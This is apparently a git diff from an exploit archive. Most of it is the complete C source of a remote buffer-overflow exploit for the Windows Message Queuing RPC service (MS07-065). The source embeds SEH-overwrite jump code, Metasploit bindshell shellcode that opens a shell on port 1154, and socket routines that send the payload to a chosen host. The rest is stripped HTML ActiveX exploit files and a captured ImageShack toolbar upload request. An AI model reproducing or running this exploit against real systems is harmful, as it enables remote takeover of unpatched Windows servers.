0xc0, 0x4b, 0x27, 0x90, 0xf8, - 0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31, - 0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5, - 0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3, - 0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87, - 0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5, - 0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6, - 0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c, - 0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82, - 0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 -}; - - -char request_2[] = { - 0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00, - 0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, - 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, - 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 -}; - - - -void -usage (char *argv) -{ - printf (" Usage: %s -h 127.0.0.1 (Universal exploit)\n", argv); - printf (" %s -h host -n dnsname [-p port]\n", argv); - exit (1); -} - - - -/************* TCP connect *************************/ - -void Disconnect (SOCKET s); - - -// ripped from isno -int -Make_Connection (char *address, int port, int timeout) -{ - struct sockaddr_in target; - SOCKET s; - int i; - DWORD bf; - fd_set wd; - struct timeval tv; - - s = socket (AF_INET, SOCK_STREAM, 0); - if (s < 0) - return -1; - - target.sin_family = AF_INET; - target.sin_addr.s_addr = inet_addr (address); - if (target.sin_addr.s_addr == 0) - { - closesocket (s); - return -2; - } - 
target.sin_port = htons ((short) port); - bf = 1; - ioctlsocket (s, FIONBIO, &bf); - tv.tv_sec = timeout; - tv.tv_usec = 0; - FD_ZERO (&wd); - FD_SET (s, &wd); - connect (s, (struct sockaddr *) &target, sizeof (target)); - if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1)) - { - closesocket (s); - return -3; - } - if (i == 0) - { - closesocket (s); - return -4; - } - i = sizeof (int); - getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i); - if ((bf != 0) || (i != sizeof (int))) - { - closesocket (s); - return -5; - } - ioctlsocket (s, FIONBIO, &bf); - return s; -} - - -void -Disconnect (SOCKET s) -{ - closesocket (s); - WSACleanup (); -} - - - - -/****************************************************/ - - - -int -main (int argc, char *argv[]) -{ - - unsigned char *target = NULL; - unsigned char *name = NULL; - int port = 2103; - - int i, j, len, len2; - - int ret; - char buffer[6000] = { 0 }; - SOCKET s; - WSADATA WSAData; - - printf("--------------------------------------------------------------------------\n"); - printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n"); - printf("-== code by axis@ph4nt0m ==-\n"); - printf("-== Http://www.ph4nt0m.org ==-\n"); - printf("-== Tested against Windows 2000 server SP4 ==-\n"); - printf - ("--------------------------------------------------------------------------\n\n"); - - if (argc < 5) - usage (argv[0]); //Handle parameters - for (i = 1; i < argc; i++) - { - if ((argv[i][0] == '-')) - { - switch (argv[i][1]) - { - case 'h': - target = (unsigned char *) argv[i + 1]; - break; - case 'p': - if (strcmp (argv[i + 1], "2103") == 0) - { - printf ("[+] Attacking default port 2103\n"); - } - else - { - port = atoi (argv[i + 1]); - } - break; - case 'n': - name = (unsigned char *) argv[i + 1]; - break; - default: - printf ("[-] Invalid argument: %s\n", argv[i]); - usage (argv[0]); - break; - } - i++; - } - else - usage (argv[0]); - } - - - request_1b = malloc (sizeof (char) * (strlen (name) * 2)); 
- - if (request_1b == NULL) - { - printf ("Allocation Error\n"); - exit (1); - } - - - strcpy (request_1b, name); - - - for (i = 0, j = 0; j < (strlen (name) * 2); j++) - { - if (!(j % 2)) - { - *(request_1b + j) = *(name + i); - } - else - { - *(request_1b + j) = '\x00'; - i++; - } - } - - - - - -/********************** attack payload ***************************/ - if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0) - { - fprintf (stderr, "[-] WSAStartup failed.\n"); - WSACleanup (); - exit (1); - } - - - Sleep (1200); - - - s = Make_Connection ((char *) target, port, 10); - if (s < 0) - { - fprintf (stderr, "[-] connect err.\n"); - exit (1); - } - - //Send our evil Payload - printf ("[*]Sending our Payload, Good Luck! ^_^\n"); - - printf ("[*]Sending RPC Bind String!\n"); - - send (s, bind_str, sizeof (bind_str), 0); - - - Sleep (1000); - - printf ("[*]Sending RPC Request Now!\n"); - - len = 56 + (strlen (name) * 2) + 640; - - request_1 = calloc (len, sizeof (char)); - - if (request_1 == NULL) - { - printf ("Allocation Error\n"); - exit (1); - } - - memcpy (request_1, request_1a, 56); - memcpy (request_1 + 56, request_1b, (strlen (name) * 2)); - memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640); - - - exit(1); - - memset (buffer, '\x41', sizeof (buffer)); // fil the buffer to trigger seh - send (s, request_1, sizeof (request_1), 0); - send (s, buffer, 5104, 0); // fil the buffer to trigger seh - send (s, request_2, sizeof (request_2), 0); - - - Sleep (100); - - memset (buffer, 0, sizeof (buffer)); - ret = recv (s, buffer, sizeof (buffer) - 1, 0); - //printf("recv: %s\n", buffer); - - Disconnect (s); - - return 0; -} - -// milw0rm.com [2008-01-18] +/* +Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) +Mod of axis's code. + +CHANGELOG + +- added dnsname as a parameter, before it was hardcoded in the + request data. 
(Marcin Kozlowski) + +Provided for legal security research and testing purposes ONLY + +Go through the code :) + +*/ + +#include +#include +#include +#include +#include +#pragma comment(lib,"ws2_32") + +// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0 +char bind_str[] = { + 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, + 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, + 0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, + 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, + 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, + 0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, + 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, + 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 +}; + + +char *request_1; + + +// RPC Request Opnum: 0x06 +char request_1a[] = { + 0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00, + 0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, + 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, + 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, + 0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00 +}; + + +char *request_1b; + + +char request_1c[] = { + 0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode + 0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx + 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode + 0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc, + 0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b, + 0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6, + 0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83, + 0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83, + 0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3, + 0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43, + 0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6, + 0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83, + 0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e, + 0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6, + 0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1, + 0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f, + 0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c, + 0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea, + 0x54, 0x86, 0x75, 0xf5, 
0x14, 0x86, 0x42, 0xd6, + 0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2, + 0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f, + 0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea, + 0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1, + 0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1, + 0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1, + 0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45, + 0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d, + 0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d, + 0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb, + 0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6, + 0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44, + 0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4, + 0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67, + 0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8, + 0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c, + 0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8, + 0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31, + 0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5, + 0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3, + 0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87, + 0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5, + 0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6, + 0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c, + 0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82, + 0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 +}; + + +char request_2[] = { + 0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00, + 0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, + 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, + 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, + 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 +}; + + + +void +usage (char *argv) +{ + printf (" Usage: %s -h 127.0.0.1 (Universal exploit)\n", argv); + printf (" %s -h host -n dnsname [-p port]\n", argv); + exit (1); +} + + + +/************* TCP connect *************************/ + +void Disconnect (SOCKET s); + + +// ripped from isno +int +Make_Connection (char *address, int port, int timeout) +{ + struct sockaddr_in target; + SOCKET s; + int i; + DWORD bf; + fd_set wd; + struct timeval tv; + + s = socket (AF_INET, SOCK_STREAM, 0); + if (s < 0) + return -1; + + target.sin_family = AF_INET; + target.sin_addr.s_addr = inet_addr (address); + if (target.sin_addr.s_addr == 0) + { + closesocket (s); + return -2; + } + target.sin_port = htons ((short) port); + bf = 1; + ioctlsocket (s, FIONBIO, &bf); + tv.tv_sec = timeout; + tv.tv_usec = 0; + FD_ZERO (&wd); + FD_SET (s, &wd); + connect (s, (struct sockaddr *) &target, sizeof 
(target)); + if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1)) + { + closesocket (s); + return -3; + } + if (i == 0) + { + closesocket (s); + return -4; + } + i = sizeof (int); + getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i); + if ((bf != 0) || (i != sizeof (int))) + { + closesocket (s); + return -5; + } + ioctlsocket (s, FIONBIO, &bf); + return s; +} + + +void +Disconnect (SOCKET s) +{ + closesocket (s); + WSACleanup (); +} + + + + +/****************************************************/ + + + +int +main (int argc, char *argv[]) +{ + + unsigned char *target = NULL; + unsigned char *name = NULL; + int port = 2103; + + int i, j, len, len2; + + int ret; + char buffer[6000] = { 0 }; + SOCKET s; + WSADATA WSAData; + + printf("--------------------------------------------------------------------------\n"); + printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n"); + printf("-== code by axis@ph4nt0m ==-\n"); + printf("-== Http://www.ph4nt0m.org ==-\n"); + printf("-== Tested against Windows 2000 server SP4 ==-\n"); + printf + ("--------------------------------------------------------------------------\n\n"); + + if (argc < 5) + usage (argv[0]); //Handle parameters + for (i = 1; i < argc; i++) + { + if ((argv[i][0] == '-')) + { + switch (argv[i][1]) + { + case 'h': + target = (unsigned char *) argv[i + 1]; + break; + case 'p': + if (strcmp (argv[i + 1], "2103") == 0) + { + printf ("[+] Attacking default port 2103\n"); + } + else + { + port = atoi (argv[i + 1]); + } + break; + case 'n': + name = (unsigned char *) argv[i + 1]; + break; + default: + printf ("[-] Invalid argument: %s\n", argv[i]); + usage (argv[0]); + break; + } + i++; + } + else + usage (argv[0]); + } + + + request_1b = malloc (sizeof (char) * (strlen (name) * 2)); + + if (request_1b == NULL) + { + printf ("Allocation Error\n"); + exit (1); + } + + + strcpy (request_1b, name); + + + for (i = 0, j = 0; j < (strlen (name) * 2); j++) + { + if (!(j % 2)) + { + *(request_1b + 
j) = *(name + i);
+ }
+ else
+ {
+ *(request_1b + j) = '\x00';
+ i++;
+ }
+ }
+
+
+
+
+
+/********************** attack payload ***************************/
+ if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
+ {
+ fprintf (stderr, "[-] WSAStartup failed.\n");
+ WSACleanup ();
+ exit (1);
+ }
+
+
+ Sleep (1200);
+
+
+ s = Make_Connection ((char *) target, port, 10);
+ if (s < 0)
+ {
+ fprintf (stderr, "[-] connect err.\n");
+ exit (1);
+ }
+
+ //Send our evil Payload
+ printf ("[*]Sending our Payload, Good Luck! ^_^\n");
+
+ printf ("[*]Sending RPC Bind String!\n");
+
+ send (s, bind_str, sizeof (bind_str), 0);
+
+
+ Sleep (1000);
+
+ printf ("[*]Sending RPC Request Now!\n");
+
+ len = 56 + (strlen (name) * 2) + 640;
+
+ request_1 = calloc (len, sizeof (char));
+
+ if (request_1 == NULL)
+ {
+ printf ("Allocation Error\n");
+ exit (1);
+ }
+
+ memcpy (request_1, request_1a, 56);
+ memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
+ memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
+
+
+ exit(1);
+
+ memset (buffer, '\x41', sizeof (buffer)); // fil the buffer to trigger seh
+ send (s, request_1, sizeof (request_1), 0);
+ send (s, buffer, 5104, 0); // fil the buffer to trigger seh
+ send (s, request_2, sizeof (request_2), 0);
+
+
+ Sleep (100);
+
+ memset (buffer, 0, sizeof (buffer));
+ ret = recv (s, buffer, sizeof (buffer) - 1, 0);
+ //printf("recv: %s\n", buffer);
+
+ Disconnect (s);
+
+ return 0;
+}
+
+// milw0rm.com [2008-01-18]
diff --git a/platforms/windows/remote/4946.html b/platforms/windows/remote/4946.html
index 3e3aa5990..0def3e618 100755
--- a/platforms/windows/remote/4946.html
+++ b/platforms/windows/remote/4946.html
@@ -1,66 +1,66 @@
- - - - - - -
-# milw0rm.com [2008-01-20]
+ + + + + + +
+# milw0rm.com [2008-01-20]
diff --git a/platforms/windows/remote/4959.html b/platforms/windows/remote/4959.html
index 92573ee11..9612f1c81 100755
--- a/platforms/windows/remote/4959.html
+++ b/platforms/windows/remote/4959.html
@@ -1,73 +1,73 @@
- - - - HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit - - - - - Unable to create object - - - -
-# milw0rm.com [2008-01-22]
+ + + + HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit + + + + + Unable to create object + + + +
+# milw0rm.com [2008-01-22]
diff --git a/platforms/windows/remote/4967.html b/platforms/windows/remote/4967.html
index 16c4ee339..cf34a71e9 100755
--- a/platforms/windows/remote/4967.html
+++ b/platforms/windows/remote/4967.html
@@ -1,118 +1,118 @@
- - - - Lycos FileUploader Control Buffer Overflow Exploit - - - - - Unable to create object - - - -
-# milw0rm.com [2008-01-22]
+ + + + Lycos FileUploader Control Buffer Overflow Exploit + + + + + Unable to create object + + + +
+# milw0rm.com [2008-01-22]
diff --git a/platforms/windows/remote/4974.html b/platforms/windows/remote/4974.html
index da7939bc8..e9e49f1c0 100755
--- a/platforms/windows/remote/4974.html
+++ b/platforms/windows/remote/4974.html
@@ -1,19 +1,19 @@
- - - - - - - - -
-# milw0rm.com [2008-01-23]
+ + + + + + + + +
+# milw0rm.com [2008-01-23]
diff --git a/platforms/windows/remote/4979.html b/platforms/windows/remote/4979.html
index d3354053e..e1930d44d 100755
--- a/platforms/windows/remote/4979.html
+++ b/platforms/windows/remote/4979.html
@@ -1,120 +1,120 @@
- - - - Move Networks Upgrade Manager Control Buffer Overflow Exploit - - - - - Unable to create object - - - -
-# milw0rm.com [2008-01-24]
+ + + + Move Networks Upgrade Manager Control Buffer Overflow Exploit + + + + + Unable to create object + + + +
+# milw0rm.com [2008-01-24]
diff --git a/platforms/windows/remote/4981.html b/platforms/windows/remote/4981.html
index 07c1ba57a..9dea49723 100755
--- a/platforms/windows/remote/4981.html
+++ b/platforms/windows/remote/4981.html
@@ -1,202 +1,202 @@ - - - - - - - - - ----- - -some wireshark's dump samples: - -POST /upload_api.php HTTP/1.1 -Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141 -Content-Length: 21755 -User-Agent: ImageShack Toolbar 4.5.7 ([..]) -Host: load9.imageshack.us -Connection: Keep-Alive -Cache-Control: no-cache -Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1 - ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="toolbar" - -IEImageShackToolbar-4.5.7.69 ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="public" - -yes ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="xml" - -newformat ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="tags" - -uhuhinterestingprivatethings ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="rembar" - -1 ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg" -Content-Type: image/jpeg -Content-Transfer-Encoding: binary - -[file content] ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg" -Content-Type: image/jpeg -Content-Transfer-Encoding: binary - -[file content] ---B-O-U-N-D-A-R-Y731553141 -Content-Disposition: form-data; name="class" - -s ---B-O-U-N-D-A-R-Y731553141-- - - -reply: - -HTTP/1.1 200 OK -Connection: close -Transfer-Encoding: chunked -X-Powered-By: PHP/5.1.2 -Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us -Set-Cookie: PHPSESSID=[..]; path=/ -Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us -Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us -Expires: Thu, 19 Nov 1981 08:52:00 GMT -Content-type: text/xml -Pragma: public -Cache-Control: must-revalidate, post-check=0, pre-check=0 -Date: Thu, 24 Jan 2008 07:56:25 GMT -Server: lighttpd/1.4.8 - - - - 0 - 0.0 
- - - xpwallpaperglasstq2.jpg - xpwallpaperglasstq2.th.jpg - - - 426 - 320 - - s - - 87.11.97.155 - - - http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg - <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a> - [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL] - [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url] - http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg - <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img 